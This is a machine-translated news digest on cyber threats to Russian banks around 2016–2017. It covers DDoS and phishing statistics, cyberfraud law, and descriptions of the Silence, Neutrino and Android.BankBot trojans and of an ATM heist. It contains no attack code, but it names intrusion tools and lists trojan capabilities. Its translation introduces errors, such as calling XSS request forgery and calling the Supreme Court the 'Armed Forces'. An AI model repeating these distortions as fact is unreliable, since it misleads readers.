As a pacing factor for buying solution of WAF respondents noted protection against vulnerabilities 0 days – 37%. Only the solutions of new generation using bessignaturny approach for detecting of the attacks have such potential. Still considerable part of the companies uses WAF for compliance to the PCI DSS standard – 27%.

36% of respondents use WAF for ensuring high rate of development: 19% – for protection of often updated code and 17% – for use of virtual patching of vulnerabilities. Increase in number of the companies applying security solutions at a stage of writing of the code speaks about the general growth of awareness on standard practicians of information security and formation of high-quality approach to providing a comprehensive protection of web applications.

Types of threats

More than a half of respondents of the financial sector (55%) note that for the last year the level of threats of DDoS grew. Still DDoS attacks get a job on the organization of the financial sector more often than on the company from other industries, for example, retail, media. However now it is important not only the fact that malefactors have all completeness of knowledge, the means interesting them are stored where exactly, but also they understand using what methods this money can be received. Having started DDoS attack as the distracting factor, malefactors using malware can make capture of a management system for cashless payments and, thus, have an opportunity to transfer money between any accounts until the detection.

From this it follows that the systems of protection applied in financial institutions are imperfect, and approaches to development of IT infrastructure require review and updating.

The threat of the attacks on failure continues to grow in service: nearly a half of respondents experienced at least one DDoS attack in 2016. Having faced existence of measures for protection against the attacks, malefactors usually switch the attention to other purposes. Including probably so a number of the companies in the financial sphere faced DDoS attacks in 2016 for the first time. At the same time, however, about 20% of the companies are in focus of malefactors and are forced to apply advanced methods of protection. Among the basic reasons leading to hit of financial institution in focus of organizers of DDoS attacks it is possible to call as organization sizes and its popularity in the market, and lack of the implemented adequate counter-measures for fight against DDoS attacks owing to what the organization can become an easy mark for cyberracketeers.

Thus, in process of widespread introduction of different solutions for fight against DDoS attacks the landscape of the market can change. In particular, the expected complication of the 'trial' attacks will continue to lead to evolution of means of protecting and to growth of threat for the organizations and the entrepreneurs who are not planning investments into cybersecurity adequate to calls.

The most often polled companies from the financial sector face a phishing (30%) and DDoS attacks (26%). In comparison with survey results of 2015, the threat of DDoS attacks remained approximately same (24% in 2015). Preserving of number of DDoS attacks and attention to them from the banking sector at rather high level is caused by a wave of the massed DDoS attacks on a number of large Russian banks: in 2016 websites of many known financial institutions from top-10 were attacked.

The threat of a phishing significantly grew (from 21% in 2015 to 30% in the 2016th) in connection with the companies coming to ICO. The unceasing agiotage around ICO led to a high fraud risk, and average users have no faithful representation how to provide own protection and are inclined not to notice Internet fraud. In the field of ICO the phishing became a serious problem, and it allows to judge that, as in allied industries, for example, in the financial sector, focus of malefactors is also displaced towards such method of gaining access to confidential data of users.

Focus shift towards a phishing – one of consequences of development of the tools available to cybercriminals. In particular, in spite of the fact that the number of cracking in unit of time in general in recent years remains at one level, at the moment financial institutions already can not always timely detect and precisely fix similar incidents.

The average number of the attacks on web applications in the financial sphere, by data Valarm, makes 1500 a day. The main part of them are the automated tools and scanners. Such activity of the automated means creates a big information background and complicates identification of real incidents. According to the statistics Valarm, the main vectors of the attacks on web applications is implementation of SQLi of operators – 26.8% and cross-site counterfeit of requests (XSS) – 25.6%. The keen interest in these types of the attacks is connected with a possibility of obtaining information on databases of clients and personal information of users. The third and fourth place is taken an exit out of limits of values of a directory - 25% and remote accomplishment of the code – 19.5%. At the same time the main part of incidents – 60% – is connected with remote accomplishment of the code.

Types of the used solutions

Most of respondents (68%) consider the most effective remedy of counteraction of DDoS hybrid solutions (on client side with participation of the operator solution, or a distributed network).

According to the research, information security remains a significant priority for the organizations of the financial sector, and this priority steadily grows: the industry is in an awakening stage. Market participants it is still not final were focused on threats of cybersecurity, but to some extent it is already possible to speak about achievement by the Russian financial institutions of a certain level of a maturity in questions of protection and risk management. Reconsideration of security policies in the bank industry will continue the development what the fact that expenses on cybersecurity are not cut down demonstrates to, and, on the contrary, generally grow. In the short term with growth of the budget we will see increases in level of security of the companies.

Sberbank: The majority of plunders of money from customer accounts "happens hands of clients"

The most part of the fraud connected with plunder of money from customer accounts "occurs hands of clients". It in November, 2017 TAdviser was said by the head of service of cyber security of Sberbank Sergey Lebed. They give the passwords, the cards, phones, transfer SMS confirmation codes. Such fraud is called social engineering, and in social engineering - "self-transfer", he says.

Within social engineering malefactors find the reason for which the person can make the actions leading to loss of money. As a rule, mercenary interest is involved - for example, to purchase something on a discount or the interesting commercial offer. Also the pretext is used that allegedly the relative of the client got into trouble, TAdviser told Lebed.

Sergey Lebed is sure that technical methods of protection of clients of Sberbank are rather effective
Sergey Lebed is sure that technical methods of protection of clients of Sberbank are rather effective

People of advanced age who think of the grandsons, children are especially subject to such influence and having received a request, at once run to the ATM, do what to them is told by malefactors, he notes

According to him, often there are cases when the systems of counteraction to fraud of bank are "seen" that fraud happens and why: when the client unexpectedly began to transfer money to the swindler's card, and we know that it is the card of the swindler. In this case we stop transaction and we call the client with the purpose to warn and stop.

Happens that social engineers even the staff of Sberbank falls into a trap, follows from Sergey Lebed's words.

Technical methods of protection of clients of Sberbank are rather effective, but counteraction to social engineers represents rather big problem. The bank sees its solution in increase in financial and computer literacy of the population. According to Sergey Lebed, the bank carries out a lot of work in this direction: explanatory work and on Sberbank platforms, and on the federal channels.

The representative of Sberbank added that one of tasks of service of cyber security, in addition to prevention of plunders of money, this stabilization and the continuity of business processes of bank and customer service. Sergey Lebed told TAdviser that from the computer attacks idle times of Sberbank in 2017 were zero minutes: "i.e., we for a second did not interrupt activity of bank owing to the different attacks".

The Supreme Court of the Russian Federation explained subtleties of qualification of cyberfraud

The Supreme Court of the Russian Federation explained to judges, to properly qualify cyberfraud and fraud with bank cards. The plenum of Russian Armed Forces issued the resolution "About Judicial Practice on Cases of Fraud, Assignment and Waste" in which for the first time speaks in what cases and how the new articles about fraud added to the Criminal Code of the Russian Federation in 2012 should be applied TASS reports in November, 2017 [15].

Use of software or software and hardware tools for impact on servers, computers (including portable) or on information and telecommunications networks for the purpose of illegal taking by someone else's property or obtaining the right to it is provided in article "Fraud in the field of Computer Information" (159.6 Criminal Code of the Russian Federation). Similar actions should be qualified in addition under articles of the Criminal Code on illegal access to computer information or on creation, use and distribution of the malware.

Use of someone else's credentials is subject to qualification under the article "Theft". Under use of someone else's credentials secret or fraudulent use of phone of the victim connected to service Mobile bank, authorization in the system of Internet payments under the stolen credentials, etc. means.

As the normal fraud provided by Article 159 of the Criminal Code of the Russian Federation it is necessary to consider plunder of property a propagation path in Network of obviously false data (creation of the counterfeit websites, online-shops, use of e-mail).

It is necessary to resort to article "Fraud using Payment Cards" (159.3 Criminal Code of the Russian Federation) in cases if the swindler issued himself for the true bank card owner at payment of purchases or banking operations. Cashing in of means via ATMs is qualified as theft.

As plunder of a non-cash using personal data of the owner, the password, data of the card received by the criminal from its owner by deception or confidence abuse is explained in the resolution of Russian Armed Forces, also should be considered by court as theft.

Production, storage, transportation of counterfeit payment cards, engineering devices and software for illegal acceptance, issue, money transfer, it is necessary to consider preparation for crime (if a crime was not committed for the reasons, independent of the malefactor).

Sale of counterfeit payment cards, engineering devices and software, unsuitable to use, allegedly for plunder of money is regarded as fraud or petty theft.

Production or purchase of counterfeit bank cards for the purpose of plunder in a large or especially large size without finishing intention up to the end (for the reasons, independent of the malefactor) is at the same time and preparation for plunder, and the completed crime provided by Article 187 of the Criminal Code of the Russian Federation ("Illegal turnover of means of payments").

Attack of the Silence virus

On October 31, 2017 Kaspersky Lab announced new cyber attack to banks. Hackers send the infected e-mails which mask under messages from real people in financial institutions.

Malefactors use a trojan under the name Silence which is attached to phishing letters. Often the text of letters looks as a standard request on opening of the account, warn in Kaspersky Lab.

Kaspersky Lab announced a hacker attack to the Russian banks
Kaspersky Lab announced a hacker attack to the Russian banks
Malefactors use legitimate administrator tools to remain unnoticed. It complicates both attack detection, and attribution — the senior anti-virus expert of Kaspersky Lab Sergey Lozhkin noted.

Letters contain the infected.chm format investments (the help file of Microsoft). When opening an investment HTML file attached it containing the harmful javascript-code is automatically started. The script loads and the dropper activates, and that already loads the modules of the Trojan of Silence working as Windows services: the module of management and control, the module of record of activity of the screen, the communication module with managing servers and the program for remote accomplishment of console commands.

Thus, hackers occupy control of the infected computer and can send letters with a harmful investment on behalf of real partners of banks.

Attacking get access to internal banking network,  some time study its internal infrastructure and record video from screens of computers of employees of the bank. After the analysis of how banking software is used, malefactors transfer money.

The first attacks using a trojan of Silence were recorded in July, 2017. Spread of a virus continues by the time of writing of article (on October 31). The hacker attacks using this virus are noticed in Russia and also in Armenia and Malaysia.[16]

Banks will acquire the right to block customer accounts when carrying out doubtful transactions

The Government of the Russian Federation introduced to the State Duma the bill drafted by the Ministry of Finance which grants the right to banks to block cards and customer accounts if the financial transactions performed by them are represented to credit institutions suspicious. At suspicion on plunder the bank should contact without delay the individual by phone or via e-mail, the legal entity — in the order set by the usage agreement of the electronic payment instrument. The legislative initiative of the authorities led to surge in activity on social networks: users are afraid of possible mass blocking of personal accounts of citizens in banks without the bases, weighty on that, and also express concern whether credit institutions will begin to abuse the right granted to them.

Criteria by which financial transactions can be referred to doubtful, are not defined yet.

Comment of the expert of TsERIH Capital Management of IK: At once it is worth emphasizing that the prepared document carries the name "About Making Changes in Separate Legal Acts of the Russian Federation (regarding Counteraction to Plunder of Money)". Thus, the law is initially aimed at protecting respectable citizens and to complicate life only to the swindlers trying to steal money from accounts of legal entities and physical persons.

For this purpose the Ministry of Finance suggests to grant the right to banks to stop for a period of up to two working days money transfer at identification of signs of commission of such transfer without the consent of the payer. At suspicion on plunder of money the bank should contact at once the client to receive confirmation on need to carry out a payment inspection.

How again adopted law will work, in many respects depends on the bylaws supplementing it. In this case we mean development of criteria by which the financial transactions performed by clients can be referred to discharge of suspicious. This work will be charged to the Central Bank, and depends on the accuracy of formulations of the regulator whether there will be problems at law-abiding citizens. Therefore we suggest to wait for the publication of this document and only after that to draw conclusions about that, how precisely it reflects present economic realities.

The right of credit institutions to supplement or change the list of the signs set to the Central Bank of the Russian Federation according to features of their activity will become one more reef. It is important to understand whether power to initiate legislation or credit institutions is had in a type in this case, without waiting for the answer from higher instance, will build up customer relations on the basis of own criteria and estimates. If the situation develops by the second option, it is impossible to exclude emergence of confusion in the banking sector in general as each bank will have own criteria for blocking of accounts. And problems at clients will arise not because of abuse of banks of the powers, and because of their desire to be reinsured.

It is important how in the light of the new law interaction between credit institution and its client in case of a disputable situation will be built. Today when blocking the account (for example, in case of introduction or removal of the large amounts on the card, at large transfers to the bank account of the client or when translating large sums of money to the third party) the bank asks to provide explanations and copies of documents confirming a source of money. Thus after consideration the bank can refuse to unblock a customer account with a formulation "Documents do not explain economic sense of transactions".

Today already at the first failure of bank in carrying out transaction as doubtful (regardless of whether there was a violation in fact or not) clients are included in the black list of refuseniks. It is created by Rosfinmonitoring and the Central Bank and, since June of the current year, provide to banks. And though the list in itself has informative character, often getting into the list forms the basis for failure of bank to the client in service. At the same time today there is no mechanism of rehabilitation of clients who were included in this list by mistake. And like those, by estimates of a number of experts, there can be about 10 percent.

Today the opinion is expressed that after entry into force of the new law banks should expect mass outflow of personal means from banks and, as a result, reduction of volumes of transactions. Allegedly this process already actively goes for the last six months. We believe similar concerns exaggerated, at least, for two reasons.

  • First, the client who takes away the means from bank on only that basis that the bank allegedly can freeze at any time its account should have the alternative mechanism for settlings with partners. At the moment the similar reliable and effectively working mechanism out of a banking system does not exist.
  • Secondly, the commissions for settlement and cash services of clients, use of money transfer systems and different payment services make an essential share in revenues of the credit and financial organizations. Reduction of number of their clients will automatically lead to decrease in profit.

Payment terminals in Russia under the attack of a trojan

At the beginning of July, 2017 "Kaspersky (earlier Kaspersky Lab)" announced that in Russia modification of the trojan of Neutrino attacking POS terminals and stealing data of bank cards actively extends. According to the statistics of the company, a quarter of all attempts of penetration of this malware into corporate systems fell on the country. Algeria, Kazakhstan, Ukraine and Egypt also got to a zone of interests Neutrino. About 10% of all attempts of infections are the share of small businesses.

Modification of Neutrino for POS terminals — not absolutely typical version of this malware which is known to researchers for a long time and repeatedly changed the functions and methods of distribution. This time the trojan hunts for data of bank cards which pass through the infected payment terminals. At this Neutrino begins activity not at once and starts collection of information — having been included in the operating system of the POS terminal, the trojan waits some time. Experts believe that thus it, most likely, tries to bypass the protective technologies starting the suspicious code in isolated virtual environment, so-called "sandboxes" with the short period of work.

Geography of distribution of the Trojan of Neutrino attacking POS terminals, March-July, 2017
Geography of distribution of the Trojan of Neutrino attacking POS terminals, March-July, 2017

"Neutrino once again serves as confirmation to the fact that cyberthreats constantly evolve. New versions of the known malwares become more difficult, their functionality extends, and appetites grow. And as the number of different digital devices increases, the fields of distribution of the malware also become wider. In such conditions pro-active protection against all variety of cyberthreats is necessary more than ever before", – Sergey Yunakovsky, the anti-virus analyst of Kaspersky Lab emphasized.

Protective solutions of Kaspersky Lab will recognize new modification of Neutrino as Trojan-Banker.Win32.NeutrinoPOS and block its activity.

Attack of the Petya virus encoder

In the regulator reported on June 29, 2017 that the attack of the Petya virus began with mailing of email letters with the enclosed virus. "Malefactors convinced the user of the text of messages to open the harmful file then the malware was activated. Presumably, infection came by means of operation of vulnerability of CVE-2017-0199 (execution of any code from Microsoft Office applications and WordPad)" — explained in the Central Bank.

The malware is submitted as Pokemon Go

In Russia mass cases of illegal withdrawal of funds from credit cards using the malware which extends under the guise of the game Pokemon Go are registered. The program intercepts the SMS sent by bank and also provides access to Internet banking. For the widest circulation of software criminals used popularity of the game Pokemon Go which official release in Russia still did not take place[17].

News was reported at a press conference on fight against cyber crime the head of department "To" Regional Office of the Ministry of Internal Affairs of the Russian Federation on the Yaroslavl region Denis Durov and zamupravlyayushchy department across the Yaroslavl region by GU of the Central Bank of Russian Federation across the CFD Evgeny Efremov.

Durov said that in 2016 in the Yaroslavl region 200 criminal cases connected with fraud and 92 affairs concerning illegal withdrawal of funds from credit cards were opened. According to him, the main methods of embezzlement is a connection to ATMs of special devices, a phishing and use of malware, and the last method becomes more and more widespread.

However the phishing remains the most widespread method of embezzlement from cards. During the phishing action criminals call the victims, are represented by employees of the bank and request credit card details, Durov notes. As of October 1, 2016 in the area it was issued to 2.1 million credit cards. Many card owners are insufficiently informed on security measures during the work with them and consider normal to report these cards to the employee of the bank by phone.

Plug-ins of browsers - means for embezzlement from cards

On January 27, 2017 Yandex Company reported in media: confidential data about bank cards of users are stolen by means of expansions for browsers. Cybercriminals learned to abduct data, extending harmful plug-ins from more than 80 thousand websites in the Internet.

The infected program expansions which supply users with useful information mean without visiting the special websites - currency rates or a weather forecast. Such programs extend through shop of expansions or from unchecked sources, and can be performed, both in stationary, and in mobile versions of browsers[18].

Advertizing of the MIR cards, (2015)
Advertizing of the MIR cards, (2015)

Installing unchecked harmful plug-ins, the user opens for cyberswindlers access to passwords, logins and data of bank cards. According to the statement of representatives of "Yandex", monthly 1.24 million users face such problems.

For protection against this type of threats, in addition to the general recommendations, it is necessary to use only legal expansions from official shops. At the same time these threats are divided into two views: threat of infection of the personal computer with the malicious software which abducts data of payment cards at payment on the Internet and also threat of infection of the device from which online management of the bank account is performed (Internet bank, mobile bank).

Nikolay Pyatiizbyantsev, head of department of incident management of department of data protection of Gazprombank

The first type of threats, according to the expert, can be neutralized use of 3D-Secure technology.

The swindler, having stolen all these maps and the one-time password, will not be able to use them for the following transaction. Some banks grant to holders of cards the right to forbid execution of operations without this technology. It is necessary to consider that the infected computer and the mobile device to which comes one-time SMS-password are different devices.

The second type of threats is much more serious and it is difficult to be protected from it.

In this case it is possible to recommend the following: the mobile phone to which one-time come SMS- passwords should not be used for online banking (mobile bank) - it is necessary to select the separate device (the computer, the smartphone, the tablet) from which access and control of the bank account is exercised, this device should not be used for any other purposes, except online banking, including it cannot be used for viewing Internet- pages, social networks, e-mail, the special software implementing the "prohibition by default" or "white lists" function should be installed on the device (everything that is not authorized, is forbidden).

Gref: 98.5% of cybercrimes happen in the financial sphere

The share of cybercrimes in the financial sphere in 2016 made 98.5%. The head of Sberbank of Russia German Gref reported about it in January. At the same time Gref emphasized that in spite of the fact that the number of the crimes committed in a kibersreda is calculated by millions, the number of convicts for their commission does not exceed several tens people.

"If to look at allocation of specialists who are engaged in investigations of cybercrimes then the proportion will be almost return: most of employees of investigating bodies are engaged in investigation of traditional crimes. Or they try to investigate cybercrimes by traditional methods, and so it (cyber crime) is not looked for at all, it is a waste of time and money", - Gref quotes TASS.

The head of Sberbank considers that for solution it is necessary to process cardinally training programs of training of specialists of law enforcement agencies, including taking into account the changes planned to introduction into the Criminal code of the Russian Federation.

The amendments drafted with participation of Sberbank and introduced to the State Duma provide an output of structure of cybercrimes from Article 159 of the Criminal Code of the Russian Federation Fraud and its inclusion in Article 158 of the Criminal Code of the Russian Federation Theft along with punishment toughening - up to 10 years of imprisonment.

Dr.Web: growth of number of the attacks on Android system is expected

On January 20, 2017 analysts of Doctor Web Company sounded the probability of significant increase in number of bank "Trojans" on the Android platform (Android-bankery) and growth of number of the attacks made at their means.

Modern bank Trojans for Android OS are created by virus writers and are on sale as commercial products through underground Internet platforms. At a hacker forum in free access the source code of one of the malware with instructions for its use appeared. Virus analysts of Doctor Web Company believe that it can lead to increase of number of Android-bankerov and growth of number of the attacks made with their help[19].

Screen screenshot before start of the Android.BankBot.33.origin virus, (2016)
Screen screenshot before start of the Android.BankBot.33.origin virus, (2016)

Virus writers published the source code of the malware in December, 2016, and specialists of Doctor Web Company detected Android-bankera created on the basis of information provided by cyber-criminals.

This Trojan under the name of Android.BankBot.149.origin extends under the guise of harmless programs. After loading on the smartphone, the tablet and installations, the banker requests access to functions of the administrator of the mobile device to complicate the removal. Then hides from the user, removing the icon from the main screen. Then the virus is connected to the managing server and expects commands.

The Trojan can perform operations:

  • send Sms;
  • intercept Sms;
  • request the administrator's rights;
  • execute USSD requests;
  • receive the list of numbers of all available contacts from the telephone directory;
  • send the SMS with the text on all numbers received in a command from the telephone directory;
  • keep track of location of the device via the GPS satellites;
  • request on devices with modern versions of Android OS additional permission to sending Sms,
  • accomplishment of calls,
  • access to the telephone directory
  • work with the GPS receiver;
  • receiving a configuration file with the list of the attacked banking applications;
  • demonstration of phishing windows.

The Trojan steals confidential information from users, monitoring applications launch "bank client" and software for work with payment systems. The sample investigated by virus analysts Dr.Web controls start more than three tens such programs. As soon as the virus finds out that one of them began work, it loads from the managing server the corresponding phishing entry form of the login and password for access to an account of bank and shows it over the attacked application.

In addition to theft of logins and passwords the Trojan tries to steal information on the bank card of the owner of the infected mobile device. For this purpose the virus monitors start of popular applications, such as Facebook, Viber, Youtube, Messenger, WhatsApp, Uber, Snapchat, WeChat, imo, Instagram, Twitter, Play the Market and shows over them a phishing settings window of a payment service of the directory of Google Play. At receipt of the SMS the Trojan switches off all sound and vibrosignals, contents of messages send to malefactors and try to delete the intercepted SMS from the list of entering. As a result the user can not only not receive notifications from credit institutions with information on unplanned activities with money, but also will not see other messages which come to its number.

The stolen data are loaded on the managing server and are available in an administration panel. With its help cyber-criminals obtain information, operate the malware. Possibilities of this Trojan quite standard for modern Android-bankerov. However, as cyber-criminals created it using information available to all, it is possible to expect emergence of a great number of similar Trojans.

Main security concerns mobile and Internet banks

Security concerns mobile and Internet banks are known long ago, and the opened new vulnerabilities, as a rule, do not make significant changes to the developed models of threats.

Image:Banki mob int pas.png

Experts are sure that remain the main problems for the last 3-5 years: a priori not entrusted environment (mobile device), danger of infection of the mobile device and computer on the Internet, insufficiency of the built-in means of protecting in software products from developers of the RBS systems and Internet banking and also failure to follow elementary security requirements by users.

Alexey Sabanov, the deputy CEO of Aladdin R.D. company, believes that the task has the solution only in those banks where also qualification of list of IT, cybersecurity and business divisions at height are able to consider losses. Professionals, when it is one command, always find the solution, not important, purely organizational or organizational technical means, he is sure.

Alexey Sizov, the head of counteraction to fraud of Information Security Center of Jet Infosystems company calls a key problem of use of RBS services vulnerability of the client.

Any security circuit is directly connected with actions or knowledge of the client. And, so what we did not provide means of protecting or confirmation of transactions to the client, it can be compromised as from the outside, and the user, - Sizov is sure. - Relative ease of impact on the client, his trustfulness, lack of information, negligence in the address with means of cybersecurity allows malefactors to bypass the most perfect means of protecting.

At the same time use of mobile platforms only reduces resistance of products and channels of service to fraud. If using the PC and the mobile phone for performing transactions (formally - it is two independent channels), some degree of information security is provided, then combining in one point and the program, both authentication methods, and payment confirmation – this threshold decreases.

Someone solves this problem decrease in types of admissible transactions, installation of limits on such platforms, but the majority do not distinguish in terms of risks classical web banking and mobile. Unfortunately, it leads to the fact that today among the attacks in a segment of mobile platforms the largest growth is fixed, - the expert notes.

Still the ode from problems is growth of a share of use of social engineering from malefactors in schemes of the attacks on clients. On the one hand, it demonstrates increase in security of technical aspects of bank services, but with another - shows simplicity and vulnerability of client side.

If yesterday "social sphere" was used only for receiving a part of data of the client, and the attack was carried out in the mode "without clients", and the user did not promote commission of illegal transaction, then today phrases from clients "and that I did" become more and more. Today social engineering it not only an opportunity to perform one illegitimate operation, but also a method to get full access to the account or the payment instrument which "nullifies" many technical aspects of protection against malefactors, - Alexey Sizov considers.

The managing partner of Maykor-BTE Maxim Nikitin, in the field of security mobile and Internet banks carries the insufficient level of data encryption and a possibility of start of mobile application in public Internet networks where interception of traffic is probable to typical problems.

The solution lies on a surface and consists in development and deployment of the improved encryption systems and applications testing on a possibility of the attacks in the public place, - he believes.

Dmitry Demidov, the Head of Department of CRM of NORBIT company (enters into LANIT group) in terms of security sees a big problem in means of authorization. In particular, he notes that simple authorization through the code received in the Sms easily is cracked. However, application of other means of authorization strongly complicates activation mobile and Internet banks.

Banks solve it a problem differently – through activation by means of ATMs or through departments. Several projects on creation of such means – both using a hardware component, and by means of only the software are now kept. Very much I hope that this problem will be solved, - he says.

Besides, mobile application development is often made in very short time. Perhaps, still very few people seriously were engaged in studying of tamper resistance of mobile applications, Demidov considers.

I believe that the speed of implementation of functions can be put in the head, to the detriment of study of security issues. It is possible that we still should hear in news about cracking of mobile applications, - the expert notes.

At the same time Vitaly Pateshman, the sales director of BSS company, speaking about the increasing relevance of security issues of RBS, notes that the expert in the field of prevention and investigation of cybercrimes and fraud using high technologies the Group-IB company booked security audit of the BSS RBS platform which showed that these solutions have high degree of security today.

In addition we implemented new opportunities due to integration into the solution Group-IB and into solutions of SafeTech company", - the representative of BSS tells.

Maxim Bolyshev, the associate director of department of banking software of RS-Bank of R-Style Softlab company selects three main problems of security. So, according to him, security of Internet banks goes to a section with convenience of use therefore banks are forced to look for a compromise between convenience and security. The second problem – high cost of the electronic signature for individuals owing to what it was not widely adopted among this user group. And the third - a large number of the various malware for mobile devices and lack of the universal, guaranteeing absolute security solution for bank and the client.

The director of work with financial institutions of FORS group company Yury Terekhin as the main problem calls increase in amounts of the hacker attacks at decrease in their professional grade.

According to him, it is connected with the fact that highly professional groups of hackers were displaced to more marginal sector in comparison with retail, and began to perform attacks to banks and payment systems (SWIFT). At the same time, high availability of instruments of cracking of vulnerabilities allows to carry out attacks on retail clients by forces of nonprofessionals or the beginning hackers. But, as for bank the cybersecurity is already passable stage, losses of banks, presumably, do not grow in this direction.

Well-known methods of protection for mobile and Internet banks will be improved further for the sake of increase in security of client means, - Terekhin considers. - Multiple-factor authorization using biometric data (scanning of fingerprints, an iris of the eye of eyes, recognition of a voice, etc.) will be used more widely.

Mikhail Domalevsky, the manager of development of department of information security of Softline group, suggests to look at security of a banking system of Russia in general. According to it, 2016 was critical for cybersecurity in the banking sector. This year openly exorcized about actions of hackers, swindlers and in general malefactors, about scales of harm which they do to banks.

Earlier banks and their clients seldom sustained severe financial losses directly from the hacker attacks, trying to be protected first of all from "drainings" of the customer base through insiders and not to allow leakage of similar information in media. Now because of the hacker attacks the bank can actually lose the license, - the expert tells. - In response to this call financial institutions integrate resources and efforts for creation of own centers of monitoring and response to cybersecurity incidents, for development of interbank exchange for fight against an output of the stolen means.

According to Domalevsky, a lot of things for protection against the hacker attacks do also the regulator. So, the Central bank issued a number of the additional regulating documents in the field of cybersecurity, in particular - the provision "About Security Requirements of Information in a Payment System of the Bank of Russia". This document obliges banks to announce cyberincidents in tough time terms.

The regulator of own Center of monitoring and response to the computer attacks in the financial sphere (FinCERT), its integration with the available commercial and banking centers of monitoring of cybersecurity, accurate regulations of interaction of all participants of process the number of the purposeful attacks of organized cyber crime should reduce creation in the long term and reduce losses from cyber attacks to banks to admissible, - the representative of Softline considers.


Russia - the leader in number of mobile bank trojans

In 2016 the number of harmful installation programs on mobile devices grew three times in comparison with 2015, to 8.5 million, said in the report of Kaspersky Lab company worldwide. It is about the programs containing viruses which the user installs on the device as it is conscious (for example, buying the doubtful application in shop), and unconsciously (already infected device itself buys and sets the application)[20].

At the same time Russia was the leader in quantity of mobile bank trojans, i.e. the programs intended for theft of financial information of users. 4% of mobile users faced this type of threats. Australia from shares follows 2.26%. "The most popular mobile bank trojan of Svpeng extended generally in Russia", says the company. Last year the superiority in this specialized rating was occupied by South Korea from shares in 13.8% of all attacked users. Russia was the third from 5.1%.

On a share of the users attacked by mobile malware of all versions, Bangladesh where 50.09% of owners of smartphones or tablets faced viruses and malware was the leader. In the three also Iran (46.87%) and Nepal (43.21%). Then there is China (last year took the first position; in the three there were also Nigeria and Syria).

Kaspersky Lab explained such results with the fact that so-called advertizing trojans which get access to system settings of the smartphone for advertizing demonstration are strongly widespread in the specified countries. These programs can also steal financial information or install third-party applications without the knowledge of the user.

Positive Technologies: as steal money from bank

On December 16, 2016 the Positive Technologies company submitted the detailed report on investigation of one of incidents in banking sector during which for one night several million rubles are stolen from six ATMs of financial institution (an equivalent in local currency).

The case helped to avoid more severe losses: tools for the attack clashed with software of ATMs of NCR company that did not allow malefactors to carry out the tasks of withdrawal of money in full.

Experts of Positive Technologies noted a number of the parts characteristic of modern cyber attacks to financial institutions:

  • Malefactors even more often use the known tools and the built-in functionality of operating systems. In a specific case the commercial software of Cobalt Strike including the multifunction trojan of Beacon of the class RAT (Remote Access Trojan) having opportunities on remote control systems was used. Are used: Ammyy Admin program, Mimikatz, PsExec, SoftPerfect Network Scanner and Team Viewer applications.
  • Use of phishing mailings remains one of successful attack vectors because of the insufficient level of awareness of workers in questions cybersecurity. The vector of infection of infrastructure of bank is based on start of the documents.exe file from the RAR archive sent by e-mail to one of employees and containing the malware. Purposeful mailing of the e-mails imitating financial correspondence and messages from service cybersecurity was conducted for a month. Start of the file of phishing letters at different times was executed at once by several employees, and infection happened because of disconnected (or using outdated bases) an antivirus at the workstation of one of them.
  • The aimed attacks become more and more organized and distributed in time. Investigation showed that the start of the attack fell on the first week of August. At the beginning of September (after fixing in infrastructure) the attacks for the purpose of identification of workstations of the employees responsible for operation of ATMs and use of payment cards began. And only in the first of October malefactors loaded the malware on ATMs and stole money: the operator sent a command for ATMs, and figureheads (tracks) at the agreed moment took away money.

Attacks on clients of bank fade into the background today, giving way to attacks on network infrastructure of banks. Malefactors realized that not all financial institutions invest in the security enough, and some do it only "for show", for the purpose of compliance to required standards.

Maxim Filippov, the director of business development of Positive Technologies in Russia

Positive Technologies. November, 2016

During the investigation of the incident experts of Positive Technologies assemble a set of hostovy and network indicators of a compromise, they are sent to FinCERT of the Bank of Russia for the purpose of dissemination of information among financial institutions and prevention of the similar attacks in the future.

"For the reporting period of FinCERT recorded considerable number of the attacks connected with substitution of input data for an automated workplace of KBR (change of contents of the XML document used for formation of the electronic message sent to the Bank of Russia). The attack was made according to the following scheme: In most cases to credit institution malefactors sent the e-mail containing the malware which is not detected by antivirus tools …"

The bank Trojan of Tordow 2.0 tries to receive root-privileges on smartphones

Researchers of Comodo revealed the new version of the bank Tordow malware attacking users in Russia. The Trojan tries to receive root-privileges on the device that does fight against it by extremely problematic business.

Tordow 2.0 is capable to perform functions of the encoder racketeer and also to intercept phone calls, Sms, to download and install applications without the knowledge of the user, to steal logins passwords, to reboot devices, and that the most dangerous, to manipulate banking data and to destroy mobile antiviruses. Read more here.

SWIFT warned banks about the growing threat of cyber attacks

The management of SWIFT sent in December to client banks the letter in which warned about the growing threat of cyber attacks. The similar document was at the disposal of edition Reuters SWIFT[21].

In the letter of SWIFT it is also said that hackers improved the methods of cyber attacks to local banking systems. One new tactics is connected with use of the software which allows hackers to get access to computers of technical support.

"Threats are permanent, izoshchrenna also have good degree of adaptivity — and already entered regulation, said in the letter of SWIFT. - Unfortunately, we continue to observe cases in which some of our clients are compromised now from thieves who then send fraudulent payment instructions through SWIFT — a similar type of messages which were used for theft of means of Bangladesh Bank".

Rostelecom reflected DDoS attacks on the largest banks and financial institutions of Russia

Rostelecom reflected in December DDoS attacks on 5 largest banks and financial institutions of Russia. The reflected attacks had similar handwriting: the type is TCP SYN Flood. Peak capacity was 3.2 million packets per second. At the same time the most long attack lasted more than 2 hours. All reflected attacks were recorded on December 5, 2016.

Learn more: DDoS attack

6-fold growth of number of cyber attacks to the Russian banks

In December, 2016 the Central Bank of Russia published the overview of financial stability in which announced more than sixfold increase in number of cyber attacks to credit institutions.

According to the Central Bank, from January to September, 2016 the number of unauthorized account transactions of physical persons and legal entities using the systems of remote banking made 103.1 thousand against 16.9 thousand for the same period of the 2015th.

The number of cyber attacks to the Russian banks grew by 6 times
The number of cyber attacks to the Russian banks grew by 6 times

At the same time the volume of the successful hacker attacks decreased by 25%: if for the first three quarters 2015 criminals managed to steal at banks about 2.16 billion rubles, then years later — 1.62 billion rubles. Stole 1.2 billion rubles in January-September, 2016 from individuals, at legal — about 387 million rubles.

The Bank of Russia considers that financial institutions incur losses from activities of cyberswindlers for the following basic reasons:

  • vulnerabilities in IT systems and  payment applications;
  • shortcomings of  information security support and lack of due observance of the requirements set by regulations and  industry standards;
  • lack of necessary coordination of activity of banks in the field of  counteraction to mass and  standard cyber attacks.

For check of the systems of online banking  regarding vulnerability to  cyber attacks of the Central Bank it intends to create the interdepartmental working group into which structure, in addition to representatives of the regulator, police officers, the Ministry of Telecom and Mass Communications, FSTEC and  the Ministry of Finance will enter. Till  2018 it is going to create the system of standardization, certification and  control of online services of banks and  to make corresponding changes to  the legislation.

